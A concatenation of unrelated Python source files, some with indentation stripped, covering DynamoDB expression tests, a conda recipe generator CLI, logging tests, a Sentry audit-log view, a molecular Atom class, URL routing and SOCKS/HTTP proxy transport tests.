assert query_dict["ExpressionAttributeValues"] == {
":deletedAt": "2020-01-01T00:00:00.000000Z",
":do_a_thing": "okay",
}
def test_add_variables_to_expression_with_bad_attribute_name():
variables = {"thingy": "THINGY", "deleted__At": "2020-02-02T00:00:00.000000Z"}
query_dict = add_variables_to_expression(dict(), variables)
assert query_dict["ExpressionAttributeNames"] == {
"#thingy": "thingy",
"#deleted__At": "deleted__At",
}
assert query_dict["ExpressionAttributeValues"] == {
":thingy": "THINGY",
":deleted__At": "2020-02-02T00:00:00.000000Z",
}
def test_add_variables_to_expression_with_duplicate_attribute_name():
query_dict = dict(ExpressionAttributeNames={"#deletedAt": "deletedAt"})
variables = dict(deletedAt="2020-02-02T00:00:00.000000Z")
with pytest.raises(
ValueError, match="Cannot add a duplicate expression attribute name #deletedAt"
):
add_variables_to_expression(query_dict, variables)
def test_add_variables_to_expression_with_duplicate_attribute_value():
query_dict = dict(ExpressionAttributeValues={":deletedAt": "2020-01-01T00:00:00.000000Z"})
variables = dict(deletedAt="2020-02-02T00:00:00.000000Z")
with pytest.raises(
ValueError, match="Cannot add a duplicate expression attribute value :deletedAt"
):
add_variables_to_expression(query_dict, variables)
@pytest.fixture
def fix_item():
items_to_clean_by_table_name = defaultdict(list)
def _create_item(table, item: dict):
table.put_item(Item=item)
items_to_clean_by_table_name[table.name].append(item)
return item
yield _create_item
ddb = boto3.resource("dynamodb")
for table_name, items in items_to_clean_by_table_name.items():
for item in items:
table = ddb.Table(table_name)
table.delete_item(Key=extract_key_from_item(table, item))
def test_expression_attributes_against_dynamodb(fix_item, integration_test_id_table):
item_random_key = {
attr: "xoto3-integ-test" + str(random.randint(0, 99999999999))
for attr in table_primary_keys(integration_test_id_table)
}
# requires string attributes for the primary key because i'm too
# lazy to make this key generation fancier for a test.
bad_attr = "~known-bad*chars"
fix_item(integration_test_id_table, {**item_random_key, **{bad_attr: "some random data"}})
def del_bad_attr(item):
item.pop(bad_attr, None)
return item
result = versioned_diffed_update_item(integration_test_id_table, del_bad_attr, item_random_key)
assert bad_attr not in result
|
158464
|
import unittest
from kbmodpy import kbmod as kb
class test_import(unittest.TestCase):
def setUp(self):
#kb.
pass
def test_something(self):
#self.assertGreater( a , b )
#self.assertEqual( a , b )
pass
|
158470
|
import argparse
import logging
import os
import sys
import requests
from colorama import Fore, Style, init
from colorama.ansi import clear_screen
import grayskull
from grayskull.base.factory import GrayskullFactory
from grayskull.cli import CLIConfig
from grayskull.cli.parser import parse_pkg_name_version
from grayskull.cli.stdout import print_msg
from grayskull.utils import origin_is_github
init(autoreset=True)
logging.basicConfig(format="%(levelname)s:%(message)s")
def main(args=None):
if not args:
args = sys.argv[1:] if sys.argv[1:] else ["--help"]
parser = argparse.ArgumentParser(description="Grayskull - Conda recipe generator")
pypi_parser = parser.add_subparsers(help="Options to generate PyPI recipes")
pypi_cmds = pypi_parser.add_parser("pypi", help="Generate recipes based on PyPI")
pypi_cmds.add_argument(
"pypi_packages", nargs="+", help="Specify the PyPI packages name.", default=[]
)
pypi_cmds.add_argument(
"--download",
"-d",
dest="download",
action="store_true",
default=False,
help="Download the sdist package and PyPI information in the same folder"
" the recipe is located.",
)
pypi_cmds.add_argument(
"--maintainers",
"-m",
dest="maintainers",
nargs="+",
help="List of maintainers which will be added to the recipe.",
)
parser.add_argument(
"--version",
"-v",
default=False,
action="store_true",
dest="version",
help="Print Grayskull version and exit",
)
parser.add_argument(
"--heman",
"--shera",
default=False,
action="store_true",
dest="grayskull_power",
help=argparse.SUPPRESS,
)
pypi_cmds.add_argument(
"--output",
"-o",
dest="output",
default=".",
help="Path to where the recipe will be created",
)
pypi_cmds.add_argument(
"--stdout",
dest="stdout",
default=True,
help="Disable or enable stdout, if it is False, Grayskull"
" will disable the prints. Default is True",
)
pypi_cmds.add_argument(
"--list-missing-deps",
default=False,
action="store_true",
dest="list_missing_deps",
help="After the execution Grayskull will print all the missing dependencies.",
)
pypi_cmds.add_argument(
"--strict-conda-forge",
default=False,
action="store_true",
dest="is_strict_conda_forge",
help="It will generate the recipes strict for the conda-forge channel.",
)
args = parser.parse_args(args)
if args.version:
print(grayskull.__version__)
return
logging.debug(f"All arguments received: args: {args}")
if args.grayskull_power:
print(
f"{Fore.BLUE}By the power of Grayskull...\n"
f"{Style.BRIGHT}I have the power!"
)
return
CLIConfig().stdout = args.stdout
CLIConfig().list_missing_deps = args.list_missing_deps
print_msg(Style.RESET_ALL)
print_msg(clear_screen())
for pkg_name in args.pypi_packages:
logging.debug(f"Starting grayskull for pkg: {pkg_name}")
pypi_label = "" if origin_is_github(pkg_name) else " (pypi)"
print_msg(
f"{Fore.GREEN}\n\n"
f"#### Initializing recipe for "
f"{Fore.BLUE}{pkg_name}{pypi_label} {Fore.GREEN}####\n"
)
pkg_name, pkg_version = parse_pkg_name_version(pkg_name)
try:
recipe = GrayskullFactory.create_recipe(
"pypi",
pkg_name,
pkg_version,
download=args.download,
is_strict_cf=args.is_strict_conda_forge,
)
except requests.exceptions.HTTPError as err:
print_msg(
f"{Fore.RED}Package seems to be missing on pypi.\nException: {err}\n\n"
)
continue
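        # Note: "mantainers" (sic) matches the keyword spelling in grayskull's
        # generate_recipe signature at the time this was written.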
recipe.generate_recipe(args.output, mantainers=args.maintainers)
print_msg(
f"\n{Fore.GREEN}#### Recipe generated on "
f"{os.path.realpath(args.output)} for {pkg_name} ####\n"
)
if __name__ == "__main__":
main(sys.argv[1:])
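# Usage sketch (assuming the standard "grayskull" console-script entry point):
#   grayskull pypi <package-name> --output ./recipes
#   grayskull --version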
|
158543
|
from .builder import build_feature_extractor  # noqa: F401
from .decoders import build_brick, build_bricks, build_decoder  # noqa: F401
from .encoders import build_backbone, build_encoder, build_enhance_module  # noqa: F401
|
158548
|
import logging
from aiotasks import run_with_exceptions_and_logs, SharedConfig
class CustomLogger(logging.StreamHandler):
    """Collects emitted log messages so tests can assert on them."""
    def __init__(self):
        super(CustomLogger, self).__init__()
        self.content = []
    def emit(self, record):
        self.content.append(record.msg)
def test_run_with_exceptions_and_logs_oks(monkeypatch):
    logger = logging.getLogger("aiotasks")
    custom = CustomLogger()
    logger.addHandler(custom)
    run_with_exceptions_and_logs(lambda x: x, 0)
    assert "Starting aioTasks" in custom.content
def test_run_with_exceptions_and_logs_exception_raised(monkeypatch):
    def raise_exception(x):
        raise Exception()
    monkeypatch.setattr(
        "aiotasks.actions.worker.console.find_manager",
        raise_exception)
    logger = logging.getLogger("aiotasks")
    custom = CustomLogger()
    logger.addHandler(custom)
    run_with_exceptions_and_logs(raise_exception, 0)
    assert "[!] Unhandled exception: " in custom.content
def test_run_with_exceptions_and_logs_ctrl_plus_c_raised(monkeypatch):
    def raise_exception(x):
        raise KeyboardInterrupt()
    monkeypatch.setattr(
        "aiotasks.actions.worker.console.find_manager",
        raise_exception)
    logger = logging.getLogger("aiotasks")
    custom = CustomLogger()
    logger.addHandler(custom)
    run_with_exceptions_and_logs(raise_exception, 1)
    assert "[*] CTRL+C caught. Exiting..." in custom.content
|
158557
|
from __future__ import absolute_import
from sentry.models import AuditLogEntry
from sentry.web.frontend.base import OrganizationView
class OrganizationAuditLogView(OrganizationView):
required_scope = 'org:write'
def get(self, request, organization):
queryset = AuditLogEntry.objects.filter(
organization=organization,
).select_related('actor', 'target_user').order_by('-datetime')
context = {
'audit_log_queryset': queryset,
}
return self.respond('sentry/organization-audit-log.html', context)
|
158575
|
class Atom(object):
""" """
def __init__(self, index, name=None, residue_index=-1, residue_name=None):
"""Create an Atom object
Args:
index (int): index of atom in the molecule
            name (str): name of the atom (e.g., N, CH)
            residue_index (int): index of residue in the molecule
            residue_name (str): name of the residue (e.g., THR, CYS)
"""
self.index = index
self.name = name
self.residue_index = residue_index
self.residue_name = residue_name
self._position = list()
self._velocity = list()
self._force = list()
self._atomtype = dict()
self.bondingtype = None
self.atomic_number = None
self.cgnr = None
self._mass = dict()
self._charge = dict()
self.ptype = "A"
self._sigma = dict()
self._epsilon = dict()
@property
def atomtype(self):
return self._atomtype
@atomtype.setter
def atomtype(self, index_atomtype):
"""Sets the atomtype
Args:
index_atomtype (tuple): A or B state and atomtype
"""
try:
idx, val = index_atomtype
except ValueError:
raise ValueError("Pass an iterable with two items.")
else:
self._atomtype[idx] = val
@property
def sigma(self):
return self._sigma
@sigma.setter
def sigma(self, index_sigma):
"""Sets the sigma
Args:
index_sigma (tuple): A or B state and sigma
"""
try:
idx, val = index_sigma
except ValueError:
raise ValueError("Pass an iterable with two items.")
else:
self._sigma[idx] = val
@property
def epsilon(self):
return self._epsilon
@epsilon.setter
def epsilon(self, index_epsilon):
"""Sets the epsilon
Args:
index_epsilon (tuple): A or B state and epsilon
"""
try:
idx, val = index_epsilon
except ValueError:
raise ValueError("Pass an iterable with two items.")
else:
self._epsilon[idx] = val
@property
def mass(self):
return self._mass
@mass.setter
def mass(self, index_mass):
"""Sets the mass
Args:
index_mass (tuple): A or B state and mass
"""
try:
idx, val = index_mass
except ValueError:
raise ValueError("Pass an iterable with two items.")
else:
self._mass[idx] = val
@property
def charge(self):
return self._charge
@charge.setter
def charge(self, index_charge):
"""Sets the charge
Args:
index_charge (tuple): A or B state and charge
"""
try:
idx, val = index_charge
except ValueError:
raise ValueError("Pass an iterable with two items.")
else:
self._charge[idx] = val
@property
def position(self):
"""Return the cartesian coordinates of the atom """
return self._position
@position.setter
def position(self, xyz):
"""Sets the position of the atom
Args:
xyz (list, float): x, y and z coordinates
"""
self._position = xyz
@property
def velocity(self):
"""Return the velocity of the atom"""
return self._velocity
@velocity.setter
def velocity(self, vxyz):
"""Sets the velocity of the atom
Args:
vxyz (list, float): x-, y- and z-directed velocity
"""
self._velocity = vxyz
@property
def force(self):
"""Return the force on the atom """
return self._force
@force.setter
def force(self, fxyz):
"""Sets the force on the atom
Args:
fxyz (list, float): x-, y- and z-directed force
"""
self._force = fxyz
def __repr__(self):
return 'Atom{0}({1}, {2})'.format(id(self), self.index, self.name)
def __str__(self):
return 'Atom({0}, {1})'.format(self.index, self.name)
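if __name__ == "__main__":
    # Usage sketch (hypothetical values): the per-state setters take
    # (state, value) tuples, e.g. the A and B states of a free-energy topology.
    atom = Atom(1, name='N', residue_index=1, residue_name='THR')
    atom.atomtype = ('A', 'opls_238')
    atom.charge = ('A', -0.5)
    atom.position = [0.0, 0.1, 0.2]
    print(atom)  # Atom(1, N)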
|
158580
|
import json
class AstToken:
def __init__(self, lex_token):
self.name = lex_token.type
if lex_token.value != self.name:
self.value = lex_token.value
def __str__(self):
return json.dumps(self, cls=AstTokenEncoder)
class AstTokenList:
def __init__(self, tokens):
self.tokens = tokens
def __str__(self):
return json.dumps(self.tokens, cls=AstTokenEncoder)
class AstTokenEncoder(json.JSONEncoder):
def default(self, some_object):
if not isinstance(some_object, AstToken):
return super(AstTokenEncoder, self).default(some_object)
return some_object.__dict__
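if __name__ == "__main__":
    # Usage sketch with a stand-in for a ply-style lex token (assumed only to
    # expose .type and .value, which is all the constructor reads).
    class FakeLexToken:
        type = "NUMBER"
        value = "42"
    print(AstToken(FakeLexToken()))                  # {"name": "NUMBER", "value": "42"}
    print(AstTokenList([AstToken(FakeLexToken())]))  # [{"name": "NUMBER", "value": "42"}]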
|
158581
|
import unittest
import pandas as pd
from reamber.base import Hold
class TestHold(unittest.TestCase):
""" The purpose of this test is to test the architecture of Base. """
def setUp(self) -> None:
self.hold = Hold(offset=1000, column=1, length=1000)
# @profile
def test_type(self):
self.assertTrue(isinstance(self.hold.data, pd.Series))
def test_eq(self):
self.assertEqual(Hold(offset=1000, column=1, length=1000), self.hold)
self.assertNotEqual(Hold(offset=1000, column=1, length=2000), self.hold)
def test_length(self):
self.assertEqual(1000, self.hold.length)
def test_tail_offset(self):
self.assertEqual(2000, self.hold.tail_offset)
def test_deepcopy(self):
self.assertFalse(self.hold is Hold(offset=1000, column=1, length=1000))
self.assertFalse(self.hold is self.hold.deepcopy())
hold = self.hold
self.assertTrue(self.hold is hold)
def test_length_op(self):
self.assertEqual(1000, self.hold.length)
self.hold.length *= 2
self.assertEqual(2000, self.hold.length)
self.assertEqual(3000, self.hold.tail_offset)
# An odd occurrence, but we support negative lengths.
self.hold.length = -1000
self.assertEqual(-1000, self.hold.length)
self.assertEqual(0, self.hold.tail_offset)
if __name__ == '__main__':
unittest.main()
|
158584
|
from django.urls import include, path
#
# On Reversing URLs
# =================
#
# Recommended Usage:
# Always use rest_framework.reverse.reverse; do not use django.urls.reverse directly.
# If a request object r is available, use reverse(name, request=r), with name as defined
# in desecapi.urls.v1 or desecapi.urls.v2. It returns a URL maintaining the currently requested API version.
# If there is no request object available, e.g. in commands, a mock object can be constructed
# carrying all information that is necessary to construct a full URL:
#
# from django.conf import settings
# from django.test import RequestFactory
# from rest_framework.versioning import NamespaceVersioning
#
# r = RequestFactory().request(HTTP_HOST=settings.ALLOWED_HOSTS[0])
# r.version = 'v1'
# r.versioning_scheme = NamespaceVersioning()
#
# Also note in this context settings.REST_FRAMEWORK['ALLOWED_VERSIONS'] and
# settings.REST_FRAMEWORK['DEFAULT_VERSIONING_CLASS']. (The latter is of type string.)
#
# Advanced Usage:
# Prefix the name of any path with 'desecapi' to get the default version,
# or prefix the name of any path with the desired namespace, e.g. 'v1:root'.
# In this case, the version information of the request will be ignored and
# providing a request object is optional. However, if no request object is provided,
# only a relative URL can be generated.
#
# Examples:
# The examples refer to the version used by the client to connect as the REQUESTED version,
# the version specified by the first argument to reverse as the SPECIFIED version, and to the
# version defined as default (see below) as the DEFAULT version.
#
# reverse('root', request) -> absolute URL, e.g. https://.../api/v1/, with the REQUESTED version
# reverse('root') -> django.urls.exceptions.NoReverseMatch
# reverse('desecapi:root') -> relative URL, e.g. api/v1/, with the DEFAULT version
# reverse('v2:root') -> relative URL, e.g. api/v2/, with the SPECIFIED version
# reverse('v2:root', request) -> absolute URL, e.g. https://.../api/v2/, with the SPECIFIED version
# reverse('desecapi:root', request) -> absolute URL, e.g. https://.../api/v1/, with the DEFAULT version
# reverse('v1:root', request) -> absolute URL, e.g. https://.../api/v1/, with the SPECIFIED version
#
# See Also:
# https://github.com/encode/django-rest-framework/issues/5659
# https://github.com/encode/django-rest-framework/issues/3825
#
# Note that from the client's perspective, there is no default version: each request needs to
# specify the version in the request URL.
#
# IMPORTANT: specify the default version as the last element in the list;
# if no other information is available, the last-specified version is used as the default for reversing URLs.
urlpatterns = [
# other available versions in no particular order
path('api/v2/', include('desecapi.urls.version_2', namespace='v2')),
# the DEFAULT version
path('api/v1/', include('desecapi.urls.version_1', namespace='v1')),
# monitoring
path('', include('django_prometheus.urls')),
]
|
158590
|
def method1(ll1, ll2, n1, n2):
hs = set()
for i in range(0, n1):
hs.add(ll1[i])
print("Intersection:")
for i in range(0, n2):
if ll2[i] in hs:
print(ll2[i], end=" ")
if __name__ == "__main__":
"""
from timeit import timeit
ll1 = [7, 1, 5, 2, 3, 6]
ll2 = [3, 8, 6, 20, 7]
n1 = len(ll1)
n2 = len(ll2)
print(timeit(lambda: method1(ll1, ll2, n1, n2), number=10000)) # 0.11873356500291266
"""
|
158668
|
import ssl
import httpcore
import httpx
import pytest # noqa
from yarl import URL # noqa
from httpx_socks import (
ProxyType,
AsyncProxyTransport,
ProxyError,
ProxyConnectionError,
ProxyTimeoutError,
)
from tests.config import (
TEST_HOST_PEM_FILE, TEST_URL_IPV4, TEST_URL_IPV4_HTTPS, SOCKS5_IPV4_URL,
LOGIN, PASSWORD, PROXY_HOST_IPV4, SOCKS5_PROXY_PORT, TEST_URL_IPV4_DELAY,
SKIP_IPV6_TESTS, SOCKS5_IPV6_URL, SOCKS4_URL, HTTP_PROXY_URL,
)
def create_ssl_context(url):
parsed_url = URL(url)
if parsed_url.scheme == 'https':
ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS)
ssl_context.verify_mode = ssl.CERT_REQUIRED
ssl_context.load_verify_locations(TEST_HOST_PEM_FILE)
return ssl_context
else:
return None
async def fetch(transport: AsyncProxyTransport,
url: str, timeout: httpx.Timeout = None):
async with httpx.AsyncClient(transport=transport) as client:
res = await client.get(url=url, timeout=timeout)
return res
@pytest.mark.parametrize('url', (TEST_URL_IPV4, TEST_URL_IPV4_HTTPS))
@pytest.mark.parametrize('rdns', (True, False))
@pytest.mark.asyncio
async def test_socks5_proxy_ipv4(url, rdns):
transport = AsyncProxyTransport.from_url(
SOCKS5_IPV4_URL,
rdns=rdns,
verify=create_ssl_context(url)
)
res = await fetch(transport=transport, url=url)
assert res.status_code == 200
@pytest.mark.asyncio
async def test_socks5_proxy_with_invalid_credentials(url=TEST_URL_IPV4):
transport = AsyncProxyTransport(
proxy_type=ProxyType.SOCKS5,
proxy_host=PROXY_HOST_IPV4,
proxy_port=SOCKS5_PROXY_PORT,
username=LOGIN,
        password=PASSWORD + '_invalid',  # any wrong suffix yields invalid credentials
verify=create_ssl_context(url)
)
with pytest.raises(ProxyError):
await fetch(transport=transport, url=url)
@pytest.mark.asyncio
async def test_socks5_proxy_with_read_timeout(url=TEST_URL_IPV4_DELAY):
transport = AsyncProxyTransport(
proxy_type=ProxyType.SOCKS5,
proxy_host=PROXY_HOST_IPV4,
proxy_port=SOCKS5_PROXY_PORT,
username=LOGIN,
password=PASSWORD,
verify=create_ssl_context(url)
)
timeout = httpx.Timeout(2, connect=32)
with pytest.raises(httpcore.ReadTimeout):
await fetch(transport=transport, url=url, timeout=timeout)
@pytest.mark.asyncio
async def test_socks5_proxy_with_connect_timeout(url=TEST_URL_IPV4):
transport = AsyncProxyTransport(
proxy_type=ProxyType.SOCKS5,
proxy_host=PROXY_HOST_IPV4,
proxy_port=SOCKS5_PROXY_PORT,
username=LOGIN,
password=PASSWORD,
verify=create_ssl_context(url)
)
timeout = httpx.Timeout(32, connect=0.001)
with pytest.raises(ProxyTimeoutError):
await fetch(transport=transport, url=url, timeout=timeout)
@pytest.mark.asyncio
async def test_socks5_proxy_with_invalid_proxy_port(unused_tcp_port,
url=TEST_URL_IPV4):
transport = AsyncProxyTransport(
proxy_type=ProxyType.SOCKS5,
proxy_host=PROXY_HOST_IPV4,
proxy_port=unused_tcp_port,
username=LOGIN,
password=PASSWORD,
verify=create_ssl_context(url)
)
with pytest.raises(ProxyConnectionError):
await fetch(transport=transport, url=url)
@pytest.mark.parametrize('url', (TEST_URL_IPV4, TEST_URL_IPV4_HTTPS))
@pytest.mark.skipif(SKIP_IPV6_TESTS, reason="TravisCI doesn't support ipv6")
@pytest.mark.asyncio
async def test_socks5_proxy_ipv6(url):
transport = AsyncProxyTransport.from_url(
SOCKS5_IPV6_URL,
verify=create_ssl_context(url)
)
res = await fetch(transport=transport, url=url)
assert res.status_code == 200
@pytest.mark.parametrize('url', (TEST_URL_IPV4, TEST_URL_IPV4_HTTPS))
@pytest.mark.parametrize('rdns', (True, False))
@pytest.mark.asyncio
async def test_socks4_proxy(url, rdns):
transport = AsyncProxyTransport.from_url(
SOCKS4_URL, rdns=rdns,
verify=create_ssl_context(url)
)
res = await fetch(transport=transport, url=url)
assert res.status_code == 200
@pytest.mark.parametrize('url', (TEST_URL_IPV4, TEST_URL_IPV4_HTTPS))
@pytest.mark.asyncio
async def test_http_proxy(url):
transport = AsyncProxyTransport.from_url(
HTTP_PROXY_URL,
verify=create_ssl_context(url)
)
res = await fetch(transport=transport, url=url)
assert res.status_code == 200
|